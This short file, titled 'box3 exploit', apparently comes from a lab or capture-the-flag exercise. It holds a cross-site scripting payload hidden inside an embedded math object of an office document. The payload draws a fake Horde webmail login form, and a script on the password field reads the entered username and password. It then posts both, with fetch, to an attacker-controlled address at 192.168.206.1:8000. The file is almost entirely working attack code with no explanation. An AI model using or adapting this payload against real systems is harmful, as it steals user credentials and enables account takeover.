box3 exploit

1. <draw:object><math:math><math:semantics>
2.             <p>XSS!</p>
3.             <form >
4.             <input type="text" id="horde_user" name="horde_user"/>
5.             <input type="password" id="horde_pass" name="horde_pass" oninput="EvilStuff()"/>
6.             </form>
7.             <script>
8.                 function EvilStuff(){
9.                     var user=document.getElementById('horde_user').value;
10.                     console.log('Caught user');
11.                     var passwrd=document.getElementById('horde_pass').value;
12.                     fetch('http://192.168.206.1:8000/file.html?c=',{
13.                         method:'POST',
14.                         mode:'no-cors',
15.                         body:user+ ' : ' +passwrd
16.                     });
17.                     console.log('fetch finished!');            
18.                 }
19.                 </script>
20.             </math:semantics></math:math></draw:object>